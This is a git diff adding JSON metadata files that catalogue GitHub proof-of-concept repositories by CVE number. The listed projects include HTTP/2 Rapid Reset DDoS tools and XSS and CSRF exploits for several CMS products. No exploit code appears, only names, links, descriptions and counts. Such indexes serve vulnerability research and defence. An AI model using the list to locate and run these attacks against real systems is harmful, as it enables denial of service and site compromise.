"https:\/\/github.com\/secengjeff\/rapidresetclient", + "description": "Tool for testing mitigations and exposure to Rapid Reset DDoS (CVE-2023-44487)", + "fork": false, + "created_at": "2023-10-13T23:55:32Z", + "updated_at": "2024-12-26T23:11:01Z", + "pushed_at": "2023-10-30T20:22:37Z", + "stargazers_count": 64, + "watchers_count": 64, + "has_discussions": false, + "forks_count": 16, + "allow_forking": true, + "is_template": false, + "web_commit_signoff_required": false, + "topics": [], + "visibility": "public", + "forks": 16, + "watchers": 64, + "score": 0, + "subscribers_count": 4 + }, + { + "id": 705614213, + "name": "CVE-2023-44487", + "full_name": "studiogangster\/CVE-2023-44487", + "owner": { + "login": "studiogangster", + "id": 12793420, + "avatar_url": "https:\/\/avatars.githubusercontent.com\/u\/12793420?v=4", + "html_url": "https:\/\/github.com\/studiogangster", + "user_view_type": "public" + }, + "html_url": "https:\/\/github.com\/studiogangster\/CVE-2023-44487", + "description": "A python based exploit to test out rapid reset attack (CVE-2023-44487)", + "fork": false, + "created_at": "2023-10-16T11:07:50Z", + "updated_at": "2024-08-11T14:52:28Z", + "pushed_at": "2023-10-16T12:32:50Z", + "stargazers_count": 16, + "watchers_count": 16, + "has_discussions": false, + "forks_count": 3, + "allow_forking": true, + "is_template": false, + "web_commit_signoff_required": false, + "topics": [ + "cve-2023-44487", + "cybersecurity", + "exploit", + "http2", + "rapid", + "rapid-reset", + "reset", + "security", + "zero-day" + ], + "visibility": "public", + "forks": 3, + "watchers": 16, + "score": 0, + "subscribers_count": 1 + }, + { + "id": 709722803, + "name": "golang-CVE-2023-44487", + "full_name": "ReToCode\/golang-CVE-2023-44487", + "owner": { + "login": "ReToCode", + "id": 16611466, + "avatar_url": "https:\/\/avatars.githubusercontent.com\/u\/16611466?v=4", + "html_url": "https:\/\/github.com\/ReToCode", + "user_view_type": "public" + }, + "html_url": "https:\/\/github.com\/ReToCode\/golang-CVE-2023-44487", + "description": null, + "fork": false, + "created_at": "2023-10-25T09:11:46Z", + "updated_at": "2024-09-26T01:42:32Z", + "pushed_at": "2023-10-26T15:01:38Z", + "stargazers_count": 2, + "watchers_count": 2, + "has_discussions": false, + "forks_count": 0, + "allow_forking": true, + "is_template": false, + "web_commit_signoff_required": false, + "topics": [], + "visibility": "public", + "forks": 0, + "watchers": 2, + "score": 0, + "subscribers_count": 2 + }, + { + "id": 716296930, + "name": "http2-rst-stream-attacker", + "full_name": "ndrscodes\/http2-rst-stream-attacker", + "owner": { + "login": "ndrscodes", + "id": 62462135, + "avatar_url": "https:\/\/avatars.githubusercontent.com\/u\/62462135?v=4", + "html_url": "https:\/\/github.com\/ndrscodes", + "user_view_type": "public" + }, + "html_url": "https:\/\/github.com\/ndrscodes\/http2-rst-stream-attacker", + "description": "Highly configurable tool to check a server's vulnerability against CVE-2023-44487 by rapidly sending HEADERS and RST_STREAM frames and documenting the server's responses.", + "fork": false, + "created_at": "2023-11-08T20:56:22Z", + "updated_at": "2024-09-11T05:27:59Z", + "pushed_at": "2024-01-11T17:44:09Z", + "stargazers_count": 3, + "watchers_count": 3, + "has_discussions": false, + "forks_count": 2, + "allow_forking": true, + "is_template": false, + "web_commit_signoff_required": false, + "topics": [ + "cve-2023-44487", + "go", + "golang", + "http2", + "it-security", + "itsec", + "itsecurity", + "research", + "vulnerabilities", + "vulnerability" + ], + "visibility": "public", + "forks": 2, + "watchers": 3, + "score": 0, + "subscribers_count": 1 + }, + { + "id": 716960166, + "name": "cve-2023-44487", + "full_name": "nxenon\/cve-2023-44487", + "owner": { + "login": "nxenon", + "id": 61124903, + "avatar_url": "https:\/\/avatars.githubusercontent.com\/u\/61124903?v=4", + "html_url": "https:\/\/github.com\/nxenon", + "user_view_type": "public" + }, + "html_url": "https:\/\/github.com\/nxenon\/cve-2023-44487", + "description": "Examples for Implementing cve-2023-44487 ( HTTP\/2 Rapid Reset Attack ) Concept", + "fork": false, + "created_at": "2023-11-10T08:38:51Z", + "updated_at": "2024-12-07T10:49:09Z", + "pushed_at": "2023-11-10T08:39:14Z", + "stargazers_count": 8, + "watchers_count": 8, + "has_discussions": false, + "forks_count": 1, + "allow_forking": true, + "is_template": false, + "web_commit_signoff_required": false, + "topics": [ + "cve-2023-44487", + "ddos", + "dos", + "http2", + "rapid-reset", + "rapid-reset-attack" + ], + "visibility": "public", + "forks": 1, + "watchers": 8, + "score": 0, + "subscribers_count": 1 + }, + { + "id": 723118471, + "name": "HTTP-2-Rapid-Reset-Client", + "full_name": "terrorist\/HTTP-2-Rapid-Reset-Client", + "owner": { + "login": "terrorist", + "id": 108696846, + "avatar_url": "https:\/\/avatars.githubusercontent.com\/u\/108696846?v=4", + "html_url": "https:\/\/github.com\/terrorist", + "user_view_type": "public" + }, + "html_url": "https:\/\/github.com\/terrorist\/HTTP-2-Rapid-Reset-Client", + "description": "A tool to check how well a system can handle Rapid Reset DDoS attacks (CVE-2023-44487).", + "fork": false, + "created_at": "2023-11-24T18:26:36Z", + "updated_at": "2024-09-02T12:43:28Z", + "pushed_at": "2023-11-24T20:19:44Z", + "stargazers_count": 48, + "watchers_count": 48, + "has_discussions": false, + "forks_count": 4, + "allow_forking": true, + "is_template": false, + "web_commit_signoff_required": false, + "topics": [], + "visibility": "public", + "forks": 4, + "watchers": 48, + "score": 0, + "subscribers_count": 0 + }, + { + "id": 730433558, + "name": "CVE-2023-44487-", + "full_name": "sigridou\/CVE-2023-44487-", + "owner": { + "login": "sigridou", + "id": 101998818, + "avatar_url": "https:\/\/avatars.githubusercontent.com\/u\/101998818?v=4", + "html_url": "https:\/\/github.com\/sigridou", + "user_view_type": "public" + }, + "html_url": "https:\/\/github.com\/sigridou\/CVE-2023-44487-", + "description": null, + "fork": false, + "created_at": "2023-12-11T23:12:03Z", + "updated_at": "2023-12-11T23:13:25Z", + "pushed_at": "2023-12-11T23:19:25Z", + "stargazers_count": 0, + "watchers_count": 0, + "has_discussions": false, + "forks_count": 0, + "allow_forking": true, + "is_template": false, + "web_commit_signoff_required": false, + "topics": [], + "visibility": "public", + "forks": 0, + "watchers": 0, + "score": 0, + "subscribers_count": 1 + }, + { + "id": 790095472, + "name": "cve-2023-44487", + "full_name": "TYuan0816\/cve-2023-44487", + "owner": { + "login": "TYuan0816", + "id": 91544853, + "avatar_url": "https:\/\/avatars.githubusercontent.com\/u\/91544853?v=4", + "html_url": "https:\/\/github.com\/TYuan0816", + "user_view_type": "public" + }, + "html_url": "https:\/\/github.com\/TYuan0816\/cve-2023-44487", + "description": null, + "fork": false, + "created_at": "2024-04-22T08:56:39Z", + "updated_at": "2024-04-22T08:56:43Z", + "pushed_at": "2024-04-22T08:56:39Z", + "stargazers_count": 0, + "watchers_count": 0, + "has_discussions": false, + "forks_count": 0, + "allow_forking": true, + "is_template": false, + "web_commit_signoff_required": false, + "topics": [], + "visibility": "public", + "forks": 0, + "watchers": 0, + "score": 0, + "subscribers_count": 1 + }, + { + "id": 806127239, + "name": "CVE-2023-44487", + "full_name": "sn130hk\/CVE-2023-44487", + "owner": { + "login": "sn130hk", + "id": 166270187, + "avatar_url": "https:\/\/avatars.githubusercontent.com\/u\/166270187?v=4", + "html_url": "https:\/\/github.com\/sn130hk", + "user_view_type": "public" + }, + "html_url": "https:\/\/github.com\/sn130hk\/CVE-2023-44487", + "description": null, + "fork": false, + "created_at": "2024-05-26T13:01:01Z", + "updated_at": "2024-05-26T13:01:01Z", + "pushed_at": "2024-05-26T13:01:01Z", + "stargazers_count": 0, + "watchers_count": 0, + "has_discussions": false, + "forks_count": 0, + "allow_forking": true, + "is_template": false, + "web_commit_signoff_required": false, + "topics": [], + "visibility": "public", + "forks": 0, + "watchers": 0, + "score": 0, + "subscribers_count": 1 + }, + { + "id": 897966381, + "name": "CVE-2023-44487-HTTP-2-Rapid-Reset-Exploit-PoC", + "full_name": "threatlabindonesia\/CVE-2023-44487-HTTP-2-Rapid-Reset-Exploit-PoC", + "owner": { + "login": "threatlabindonesia", + "id": 89779121, + "avatar_url": "https:\/\/avatars.githubusercontent.com\/u\/89779121?v=4", + "html_url": "https:\/\/github.com\/threatlabindonesia", + "user_view_type": "public" + }, + "html_url": "https:\/\/github.com\/threatlabindonesia\/CVE-2023-44487-HTTP-2-Rapid-Reset-Exploit-PoC", + "description": null, + "fork": false, + "created_at": "2024-12-03T14:54:21Z", + "updated_at": "2024-12-03T15:04:52Z", + "pushed_at": "2024-12-03T15:03:04Z", + "stargazers_count": 0, + "watchers_count": 0, + "has_discussions": false, + "forks_count": 1, + "allow_forking": true, + "is_template": false, + "web_commit_signoff_required": false, + "topics": [], + "visibility": "public", + "forks": 1, + "watchers": 0, + "score": 0, + "subscribers_count": 1 + } +] \ No newline at end of file diff --git a/2023/CVE-2023-4450.json b/2023/CVE-2023-4450.json new file mode 100644 index 0000000000..c31ba39ca8 --- /dev/null +++ b/2023/CVE-2023-4450.json @@ -0,0 +1,33 @@ +[ + { + "id": 753929545, + "name": "CVE-2023-4450-Attack", + "full_name": "ilikeoyt\/CVE-2023-4450-Attack", + "owner": { + "login": "ilikeoyt", + "id": 122429787, + "avatar_url": "https:\/\/avatars.githubusercontent.com\/u\/122429787?v=4", + "html_url": "https:\/\/github.com\/ilikeoyt", + "user_view_type": "public" + }, + "html_url": "https:\/\/github.com\/ilikeoyt\/CVE-2023-4450-Attack", + "description": null, + "fork": false, + "created_at": "2024-02-07T03:51:34Z", + "updated_at": "2024-09-12T01:54:57Z", + "pushed_at": "2024-02-07T06:34:02Z", + "stargazers_count": 21, + "watchers_count": 21, + "has_discussions": false, + "forks_count": 0, + "allow_forking": true, + "is_template": false, + "web_commit_signoff_required": false, + "topics": [], + "visibility": "public", + "forks": 0, + "watchers": 21, + "score": 0, + "subscribers_count": 1 + } +] \ No newline at end of file diff --git a/2023/CVE-2023-4460.json b/2023/CVE-2023-4460.json new file mode 100644 index 0000000000..c690e1e328 --- /dev/null +++ b/2023/CVE-2023-4460.json @@ -0,0 +1,35 @@ +[ + { + "id": 677181767, + "name": "poc-cve-xss-uploading-svg", + "full_name": "0xn4d\/poc-cve-xss-uploading-svg", + "owner": { + "login": "0xn4d", + "id": 85083396, + "avatar_url": "https:\/\/avatars.githubusercontent.com\/u\/85083396?v=4", + "html_url": "https:\/\/github.com\/0xn4d", + "user_view_type": "public" + }, + "html_url": "https:\/\/github.com\/0xn4d\/poc-cve-xss-uploading-svg", + "description": "CVE-2023-4460", + "fork": false, + "created_at": "2023-08-11T00:11:45Z", + "updated_at": "2023-08-21T18:17:13Z", + "pushed_at": "2023-08-11T00:41:06Z", + "stargazers_count": 0, + "watchers_count": 0, + "has_discussions": false, + "forks_count": 0, + "allow_forking": true, + "is_template": false, + "web_commit_signoff_required": false, + "topics": [ + "cve-2023-4460" + ], + "visibility": "public", + "forks": 0, + "watchers": 0, + "score": 0, + "subscribers_count": 1 + } +] \ No newline at end of file diff --git a/2023/CVE-2023-44758.json b/2023/CVE-2023-44758.json new file mode 100644 index 0000000000..21d72fac62 --- /dev/null +++ b/2023/CVE-2023-44758.json @@ -0,0 +1,33 @@ +[ + { + "id": 696286258, + "name": "CVE-2023-44758_GDidees-CMS-Stored-XSS---Title", + "full_name": "sromanhu\/CVE-2023-44758_GDidees-CMS-Stored-XSS---Title", + "owner": { + "login": "sromanhu", + "id": 87250597, + "avatar_url": "https:\/\/avatars.githubusercontent.com\/u\/87250597?v=4", + "html_url": "https:\/\/github.com\/sromanhu", + "user_view_type": "public" + }, + "html_url": "https:\/\/github.com\/sromanhu\/CVE-2023-44758_GDidees-CMS-Stored-XSS---Title", + "description": "GDidees CMS 3.9.2 is affected by a Cross-Site Scripting (XSS) vulnerability that allows attackers to execute arbitrary code via a crafted payload to the Page Title", + "fork": false, + "created_at": "2023-09-25T13:07:05Z", + "updated_at": "2023-10-06T14:04:56Z", + "pushed_at": "2023-09-25T13:26:07Z", + "stargazers_count": 0, + "watchers_count": 0, + "has_discussions": false, + "forks_count": 0, + "allow_forking": true, + "is_template": false, + "web_commit_signoff_required": false, + "topics": [], + "visibility": "public", + "forks": 0, + "watchers": 0, + "score": 0, + "subscribers_count": 1 + } +] \ No newline at end of file diff --git a/2023/CVE-2023-44760.json b/2023/CVE-2023-44760.json new file mode 100644 index 0000000000..19774182af --- /dev/null +++ b/2023/CVE-2023-44760.json @@ -0,0 +1,33 @@ +[ + { + "id": 696301802, + "name": "CVE-2023-44760_ConcreteCMS-Stored-XSS---TrackingCodes", + "full_name": "sromanhu\/CVE-2023-44760_ConcreteCMS-Stored-XSS---TrackingCodes", + "owner": { + "login": "sromanhu", + "id": 87250597, + "avatar_url": "https:\/\/avatars.githubusercontent.com\/u\/87250597?v=4", + "html_url": "https:\/\/github.com\/sromanhu", + "user_view_type": "public" + }, + "html_url": "https:\/\/github.com\/sromanhu\/CVE-2023-44760_ConcreteCMS-Stored-XSS---TrackingCodes", + "description": "Multiple Cross Site Scripting vulnerability in ConcreteCMS v.9.2.1 allows a local attacker to execute arbitrary code via a crafted script to the Header and Footer Tracking Codes of the SEO & Statistics", + "fork": false, + "created_at": "2023-09-25T13:39:24Z", + "updated_at": "2023-10-06T14:05:44Z", + "pushed_at": "2023-09-25T13:46:38Z", + "stargazers_count": 0, + "watchers_count": 0, + "has_discussions": false, + "forks_count": 0, + "allow_forking": true, + "is_template": true, + "web_commit_signoff_required": false, + "topics": [], + "visibility": "public", + "forks": 0, + "watchers": 0, + "score": 0, + "subscribers_count": 1 + } +] \ No newline at end of file diff --git a/2023/CVE-2023-44761.json b/2023/CVE-2023-44761.json new file mode 100644 index 0000000000..d708aaa5e6 --- /dev/null +++ b/2023/CVE-2023-44761.json @@ -0,0 +1,33 @@ +[ + { + "id": 696493859, + "name": "CVE-2023-44761_ConcreteCMS-Stored-XSS---Forms", + "full_name": "sromanhu\/CVE-2023-44761_ConcreteCMS-Stored-XSS---Forms", + "owner": { + "login": "sromanhu", + "id": 87250597, + "avatar_url": "https:\/\/avatars.githubusercontent.com\/u\/87250597?v=4", + "html_url": "https:\/\/github.com\/sromanhu", + "user_view_type": "public" + }, + "html_url": "https:\/\/github.com\/sromanhu\/CVE-2023-44761_ConcreteCMS-Stored-XSS---Forms", + "description": "Cross Site Scripting vulnerability in ConcreteCMS v.9.2.1 allows a local attacker to execute arbitrary code via a crafted script to the Form of the Data Objects.", + "fork": false, + "created_at": "2023-09-25T21:21:10Z", + "updated_at": "2023-10-06T14:06:13Z", + "pushed_at": "2023-09-25T21:39:35Z", + "stargazers_count": 0, + "watchers_count": 0, + "has_discussions": false, + "forks_count": 0, + "allow_forking": true, + "is_template": false, + "web_commit_signoff_required": false, + "topics": [], + "visibility": "public", + "forks": 0, + "watchers": 0, + "score": 0, + "subscribers_count": 1 + } +] \ No newline at end of file diff --git a/2023/CVE-2023-44762.json b/2023/CVE-2023-44762.json new file mode 100644 index 0000000000..e514dc9215 --- /dev/null +++ b/2023/CVE-2023-44762.json @@ -0,0 +1,33 @@ +[ + { + "id": 696500172, + "name": "CVE-2023-44762_ConcreteCMS-Reflected-XSS---Tags", + "full_name": "sromanhu\/CVE-2023-44762_ConcreteCMS-Reflected-XSS---Tags", + "owner": { + "login": "sromanhu", + "id": 87250597, + "avatar_url": "https:\/\/avatars.githubusercontent.com\/u\/87250597?v=4", + "html_url": "https:\/\/github.com\/sromanhu", + "user_view_type": "public" + }, + "html_url": "https:\/\/github.com\/sromanhu\/CVE-2023-44762_ConcreteCMS-Reflected-XSS---Tags", + "description": "Cross Site Scripting vulnerability in ConcreteCMS v.9.2.1 allows a local attacker to execute arbitrary code via a crafted script to the Tags from Settings - Tags", + "fork": false, + "created_at": "2023-09-25T21:43:57Z", + "updated_at": "2023-10-06T14:06:37Z", + "pushed_at": "2023-09-25T21:46:47Z", + "stargazers_count": 0, + "watchers_count": 0, + "has_discussions": false, + "forks_count": 0, + "allow_forking": true, + "is_template": false, + "web_commit_signoff_required": false, + "topics": [], + "visibility": "public", + "forks": 0, + "watchers": 0, + "score": 0, + "subscribers_count": 1 + } +] \ No newline at end of file diff --git a/2023/CVE-2023-44763.json b/2023/CVE-2023-44763.json new file mode 100644 index 0000000000..6bc5fe0c54 --- /dev/null +++ b/2023/CVE-2023-44763.json @@ -0,0 +1,33 @@ +[ + { + "id": 696503465, + "name": "CVE-2023-44763_ConcreteCMS-Arbitrary-file-upload-Thumbnail", + "full_name": "sromanhu\/CVE-2023-44763_ConcreteCMS-Arbitrary-file-upload-Thumbnail", + "owner": { + "login": "sromanhu", + "id": 87250597, + "avatar_url": "https:\/\/avatars.githubusercontent.com\/u\/87250597?v=4", + "html_url": "https:\/\/github.com\/sromanhu", + "user_view_type": "public" + }, + "html_url": "https:\/\/github.com\/sromanhu\/CVE-2023-44763_ConcreteCMS-Arbitrary-file-upload-Thumbnail", + "description": "ConcreteCMS v.9.2.1 is affected by Arbitrary File Upload vulnerability that allows Cross-Site Scriting (XSS) Stored.", + "fork": false, + "created_at": "2023-09-25T21:56:34Z", + "updated_at": "2023-10-06T14:07:05Z", + "pushed_at": "2023-09-25T22:05:17Z", + "stargazers_count": 0, + "watchers_count": 0, + "has_discussions": false, + "forks_count": 0, + "allow_forking": true, + "is_template": false, + "web_commit_signoff_required": false, + "topics": [], + "visibility": "public", + "forks": 0, + "watchers": 0, + "score": 0, + "subscribers_count": 1 + } +] \ No newline at end of file diff --git a/2023/CVE-2023-44764.json b/2023/CVE-2023-44764.json new file mode 100644 index 0000000000..69ce775b08 --- /dev/null +++ b/2023/CVE-2023-44764.json @@ -0,0 +1,33 @@ +[ + { + "id": 696502329, + "name": "CVE-2023-44764_ConcreteCMS-Stored-XSS---Site_Installation", + "full_name": "sromanhu\/CVE-2023-44764_ConcreteCMS-Stored-XSS---Site_Installation", + "owner": { + "login": "sromanhu", + "id": 87250597, + "avatar_url": "https:\/\/avatars.githubusercontent.com\/u\/87250597?v=4", + "html_url": "https:\/\/github.com\/sromanhu", + "user_view_type": "public" + }, + "html_url": "https:\/\/github.com\/sromanhu\/CVE-2023-44764_ConcreteCMS-Stored-XSS---Site_Installation", + "description": "Cross Site Scripting vulnerability in ConcreteCMS v.9.2.1 allows a local attacker to execute arbitrary code via a crafted script to the SITE from installation or Settings.", + "fork": false, + "created_at": "2023-09-25T21:52:16Z", + "updated_at": "2023-10-06T14:07:37Z", + "pushed_at": "2023-09-25T21:54:50Z", + "stargazers_count": 0, + "watchers_count": 0, + "has_discussions": false, + "forks_count": 0, + "allow_forking": true, + "is_template": false, + "web_commit_signoff_required": false, + "topics": [], + "visibility": "public", + "forks": 0, + "watchers": 0, + "score": 0, + "subscribers_count": 1 + } +] \ No newline at end of file diff --git a/2023/CVE-2023-44765.json b/2023/CVE-2023-44765.json new file mode 100644 index 0000000000..6ac468903c --- /dev/null +++ b/2023/CVE-2023-44765.json @@ -0,0 +1,33 @@ +[ + { + "id": 696490972, + "name": "CVE-2023-44765_ConcreteCMS-Stored-XSS---Associations", + "full_name": "sromanhu\/CVE-2023-44765_ConcreteCMS-Stored-XSS---Associations", + "owner": { + "login": "sromanhu", + "id": 87250597, + "avatar_url": "https:\/\/avatars.githubusercontent.com\/u\/87250597?v=4", + "html_url": "https:\/\/github.com\/sromanhu", + "user_view_type": "public" + }, + "html_url": "https:\/\/github.com\/sromanhu\/CVE-2023-44765_ConcreteCMS-Stored-XSS---Associations", + "description": "Cross Site Scripting vulnerability in ConcreteCMS v.9.2.1 allows a local attacker to execute arbitrary code via a crafted script to the Plural Handle of the Data Objects from System & Settings", + "fork": false, + "created_at": "2023-09-25T21:11:14Z", + "updated_at": "2023-10-06T14:08:14Z", + "pushed_at": "2023-09-25T21:19:21Z", + "stargazers_count": 0, + "watchers_count": 0, + "has_discussions": false, + "forks_count": 0, + "allow_forking": true, + "is_template": false, + "web_commit_signoff_required": false, + "topics": [], + "visibility": "public", + "forks": 0, + "watchers": 0, + "score": 0, + "subscribers_count": 1 + } +] \ No newline at end of file diff --git a/2023/CVE-2023-44766.json b/2023/CVE-2023-44766.json new file mode 100644 index 0000000000..a7f8097aa0 --- /dev/null +++ b/2023/CVE-2023-44766.json @@ -0,0 +1,33 @@ +[ + { + "id": 696501225, + "name": "CVE-2023-44766_ConcreteCMS-Stored-XSS---SEO", + "full_name": "sromanhu\/CVE-2023-44766_ConcreteCMS-Stored-XSS---SEO", + "owner": { + "login": "sromanhu", + "id": 87250597, + "avatar_url": "https:\/\/avatars.githubusercontent.com\/u\/87250597?v=4", + "html_url": "https:\/\/github.com\/sromanhu", + "user_view_type": "public" + }, + "html_url": "https:\/\/github.com\/sromanhu\/CVE-2023-44766_ConcreteCMS-Stored-XSS---SEO", + "description": "Cross Site Scripting vulnerability in ConcreteCMS v.9.2.1 allows a local attacker to execute arbitrary code via a crafted script to the SEO - Header Extra Content from Page Settings. ", + "fork": false, + "created_at": "2023-09-25T21:48:07Z", + "updated_at": "2023-10-06T14:08:47Z", + "pushed_at": "2023-09-25T21:50:07Z", + "stargazers_count": 0, + "watchers_count": 0, + "has_discussions": false, + "forks_count": 0, + "allow_forking": true, + "is_template": false, + "web_commit_signoff_required": false, + "topics": [], + "visibility": "public", + "forks": 0, + "watchers": 0, + "score": 0, + "subscribers_count": 1 + } +] \ No newline at end of file diff --git a/2023/CVE-2023-44767.json b/2023/CVE-2023-44767.json new file mode 100644 index 0000000000..c3c0e15da5 --- /dev/null +++ b/2023/CVE-2023-44767.json @@ -0,0 +1,33 @@ +[ + { + "id": 695156657, + "name": "CVE-2023-44767_RiteCMS-File-Upload--XSS---Filemanager", + "full_name": "sromanhu\/CVE-2023-44767_RiteCMS-File-Upload--XSS---Filemanager", + "owner": { + "login": "sromanhu", + "id": 87250597, + "avatar_url": "https:\/\/avatars.githubusercontent.com\/u\/87250597?v=4", + "html_url": "https:\/\/github.com\/sromanhu", + "user_view_type": "public" + }, + "html_url": "https:\/\/github.com\/sromanhu\/CVE-2023-44767_RiteCMS-File-Upload--XSS---Filemanager", + "description": "RiteCMS 3.0 is affected by File Upload - XSS vulnerability that allows attackers to upload a PDF file with a hidden XSS that when executed will launch the XSS pop-up", + "fork": false, + "created_at": "2023-09-22T13:31:18Z", + "updated_at": "2023-10-06T14:09:21Z", + "pushed_at": "2023-09-22T13:39:48Z", + "stargazers_count": 0, + "watchers_count": 0, + "has_discussions": false, + "forks_count": 0, + "allow_forking": true, + "is_template": false, + "web_commit_signoff_required": false, + "topics": [], + "visibility": "public", + "forks": 0, + "watchers": 0, + "score": 0, + "subscribers_count": 1 + } +] \ No newline at end of file diff --git a/2023/CVE-2023-44769.json b/2023/CVE-2023-44769.json new file mode 100644 index 0000000000..a18f1bb213 --- /dev/null +++ b/2023/CVE-2023-44769.json @@ -0,0 +1,33 @@ +[ + { + "id": 697995967, + "name": "CVE-2023-44769_ZenarioCMS--Reflected-XSS---Alias", + "full_name": "sromanhu\/CVE-2023-44769_ZenarioCMS--Reflected-XSS---Alias", + "owner": { + "login": "sromanhu", + "id": 87250597, + "avatar_url": "https:\/\/avatars.githubusercontent.com\/u\/87250597?v=4", + "html_url": "https:\/\/github.com\/sromanhu", + "user_view_type": "public" + }, + "html_url": "https:\/\/github.com\/sromanhu\/CVE-2023-44769_ZenarioCMS--Reflected-XSS---Alias", + "description": "Zenariocms 9.4.59197 is affected by a Cross-Site Scripting (XSS) vulnerability that allows attackers to execute arbitrary code via a crafted payload to the Spare aliases from Alias.", + "fork": false, + "created_at": "2023-09-28T23:08:12Z", + "updated_at": "2023-10-06T14:09:50Z", + "pushed_at": "2023-09-28T23:15:45Z", + "stargazers_count": 0, + "watchers_count": 0, + "has_discussions": false, + "forks_count": 0, + "allow_forking": true, + "is_template": false, + "web_commit_signoff_required": false, + "topics": [], + "visibility": "public", + "forks": 0, + "watchers": 0, + "score": 0, + "subscribers_count": 1 + } +] \ No newline at end of file diff --git a/2023/CVE-2023-44770.json b/2023/CVE-2023-44770.json new file mode 100644 index 0000000000..c3664509a0 --- /dev/null +++ b/2023/CVE-2023-44770.json @@ -0,0 +1,33 @@ +[ + { + "id": 697998333, + "name": "CVE-2023-44770_ZenarioCMS--Reflected-XSS---Organizer-Alias", + "full_name": "sromanhu\/CVE-2023-44770_ZenarioCMS--Reflected-XSS---Organizer-Alias", + "owner": { + "login": "sromanhu", + "id": 87250597, + "avatar_url": "https:\/\/avatars.githubusercontent.com\/u\/87250597?v=4", + "html_url": "https:\/\/github.com\/sromanhu", + "user_view_type": "public" + }, + "html_url": "https:\/\/github.com\/sromanhu\/CVE-2023-44770_ZenarioCMS--Reflected-XSS---Organizer-Alias", + "description": "Zenariocms 9.4.59197 is affected by a Cross-Site Scripting (XSS) vulnerability that allows attackers to execute arbitrary code via a crafted payload to the Spare alias from organizer.", + "fork": false, + "created_at": "2023-09-28T23:18:07Z", + "updated_at": "2023-10-06T14:10:32Z", + "pushed_at": "2023-09-28T23:21:44Z", + "stargazers_count": 0, + "watchers_count": 0, + "has_discussions": false, + "forks_count": 0, + "allow_forking": true, + "is_template": false, + "web_commit_signoff_required": false, + "topics": [], + "visibility": "public", + "forks": 0, + "watchers": 0, + "score": 0, + "subscribers_count": 1 + } +] \ No newline at end of file diff --git a/2023/CVE-2023-44771.json b/2023/CVE-2023-44771.json new file mode 100644 index 0000000000..92f2c6fa31 --- /dev/null +++ b/2023/CVE-2023-44771.json @@ -0,0 +1,33 @@ +[ + { + "id": 697994632, + "name": "CVE-2023-44771_ZenarioCMS--Stored-XSS---Page-Layout", + "full_name": "sromanhu\/CVE-2023-44771_ZenarioCMS--Stored-XSS---Page-Layout", + "owner": { + "login": "sromanhu", + "id": 87250597, + "avatar_url": "https:\/\/avatars.githubusercontent.com\/u\/87250597?v=4", + "html_url": "https:\/\/github.com\/sromanhu", + "user_view_type": "public" + }, + "html_url": "https:\/\/github.com\/sromanhu\/CVE-2023-44771_ZenarioCMS--Stored-XSS---Page-Layout", + "description": "Zenariocms 9.4.59197 is affected by a Cross-Site Scripting (XSS) vulnerability that allows attackers to execute arbitrary code via a crafted payload to the Page Layout", + "fork": false, + "created_at": "2023-09-28T23:02:00Z", + "updated_at": "2023-10-06T14:11:18Z", + "pushed_at": "2023-09-28T23:05:59Z", + "stargazers_count": 0, + "watchers_count": 0, + "has_discussions": false, + "forks_count": 0, + "allow_forking": true, + "is_template": true, + "web_commit_signoff_required": false, + "topics": [], + "visibility": "public", + "forks": 0, + "watchers": 0, + "score": 0, + "subscribers_count": 1 + } +] \ No newline at end of file diff --git a/2023/CVE-2023-44811.json b/2023/CVE-2023-44811.json new file mode 100644 index 0000000000..8c2d6e3c59 --- /dev/null +++ b/2023/CVE-2023-44811.json @@ -0,0 +1,33 @@ +[ + { + "id": 696867620, + "name": "CVE-2023-44811", + "full_name": "ahrixia\/CVE-2023-44811", + "owner": { + "login": "ahrixia", + "id": 35935843, + "avatar_url": "https:\/\/avatars.githubusercontent.com\/u\/35935843?v=4", + "html_url": "https:\/\/github.com\/ahrixia", + "user_view_type": "public" + }, + "html_url": "https:\/\/github.com\/ahrixia\/CVE-2023-44811", + "description": "mooSocial v3.1.8 is vulnerable to Cross Site Request Forgery (CSRF) which allows attacker to change admin password.", + "fork": false, + "created_at": "2023-09-26T15:25:42Z", + "updated_at": "2024-08-12T20:32:48Z", + "pushed_at": "2023-10-07T01:31:05Z", + "stargazers_count": 0, + "watchers_count": 0, + "has_discussions": false, + "forks_count": 1, + "allow_forking": true, + "is_template": false, + "web_commit_signoff_required": false, + "topics": [], + "visibility": "public", + "forks": 1, + "watchers": 0, + "score": 0, + "subscribers_count": 1 + } +] \ No newline at end of file diff --git a/2023/CVE-2023-44812.json b/2023/CVE-2023-44812.json new file mode 100644 index 0000000000..17fefd3d8b --- /dev/null +++ b/2023/CVE-2023-44812.json @@ -0,0 +1,33 @@ +[ + { + "id": 696877711, + "name": "CVE-2023-44812", + "full_name": "ahrixia\/CVE-2023-44812", + "owner": { + "login": "ahrixia", + "id": 35935843, + "avatar_url": "https:\/\/avatars.githubusercontent.com\/u\/35935843?v=4", + "html_url": "https:\/\/github.com\/ahrixia", + "user_view_type": "public" + }, + "html_url": "https:\/\/github.com\/ahrixia\/CVE-2023-44812", + "description": "mooSocial v3.1.8 is vulnerable to cross-site scripting on Admin redirect function.", + "fork": false, + "created_at": "2023-09-26T15:47:50Z", + "updated_at": "2024-08-12T20:32:48Z", + "pushed_at": "2023-10-07T01:32:59Z", + "stargazers_count": 0, + "watchers_count": 0, + "has_discussions": false, + "forks_count": 1, + "allow_forking": true, + "is_template": false, + "web_commit_signoff_required": false, + "topics": [], + "visibility": "public", + "forks": 1, + "watchers": 0, + "score": 0, + "subscribers_count": 1 + } +] \ No newline at end of file diff --git a/2023/CVE-2023-44813.json b/2023/CVE-2023-44813.json new file mode 100644 index 0000000000..b0ee8c4ad4 --- /dev/null +++ b/2023/CVE-2023-44813.json @@ -0,0 +1,33 @@ +[ + { + "id": 696890652, + "name": "CVE-2023-44813", + "full_name": "ahrixia\/CVE-2023-44813", + "owner": { + "login": "ahrixia", + "id": 35935843, + "avatar_url": "https:\/\/avatars.githubusercontent.com\/u\/35935843?v=4", + "html_url": "https:\/\/github.com\/ahrixia", + "user_view_type": "public" + }, + "html_url": "https:\/\/github.com\/ahrixia\/CVE-2023-44813", + "description": "mooSocial v3.1.8 is vulnerable to cross-site scripting on Invite Friend function.", + "fork": false, + "created_at": "2023-09-26T16:16:46Z", + "updated_at": "2024-08-12T20:32:48Z", + "pushed_at": "2023-10-07T01:35:39Z", + "stargazers_count": 0, + "watchers_count": 0, + "has_discussions": false, + "forks_count": 1, + "allow_forking": true, + "is_template": false, + "web_commit_signoff_required": false, + "topics": [], + "visibility": "public", + "forks": 1, + "watchers": 0, + "score": 0, + "subscribers_count": 1 + } +] \ No newline at end of 